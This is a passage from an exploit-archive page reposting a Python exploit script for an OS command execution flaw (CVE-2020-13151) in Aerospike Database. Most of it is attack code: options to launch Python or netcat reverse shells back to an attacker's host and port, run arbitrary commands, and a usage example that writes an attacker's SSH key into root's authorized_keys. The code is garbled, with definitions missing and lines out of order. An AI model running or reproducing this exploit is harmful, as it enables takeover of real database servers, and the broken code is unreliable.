Aerospike database 5.1.0.3 os command execution Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-11-17 |
Type : remote |
Platform : multiple
This exploit / vulnerability (Aerospike database 5.1.0.3 OS command execution) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: < 5.1.0.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-13151
#!/usr/bin/env python3
import argparse
import random
import os, sys
from time import sleep
import string
# requires aerospike package from pip
import aerospike
# if this isn't installing, make sure os dependencies are met
# sudo apt-get install python-dev
# sudo apt-get install libssl-dev
# sudo apt-get install python-pip
# sudo apt-get install zlib1g-dev
if cfg.pythonshell or cfg.netcatshell:
sys.stdout.flush()
print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
sys.stdout.flush()
for i in range(4):
print(".", end="")
sys.stdout.flush()
sleep(1)
print(".")
_send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
if cfg.cmd:
print(f"[+] issuing command \"{cfg.cmd}\"")
_send(client, cfg, cfg.cmd)
if __name__ == '__main__':
if len(sys.argv) == 1:
print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
print("... or ... ")
print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
sys.exit(0)
parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
parser.add_argument("--lhost", help="host to use for reverse shell callback")
parser.add_argument("--lport", help="port to use for reverse shell callback")
parser.add_argument("--cmd", help="custom command to issue against the underlying host")
parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
cfg = parser.parse_args()
if not cfg.setname:
cfg.setname = 'cve202013151'
if not cfg.dummystring:
cfg.dummystring = _random_string(16)
if not cfg.udfpath:
cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
if cfg.pythonshell or cfg.netcatshell:
assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"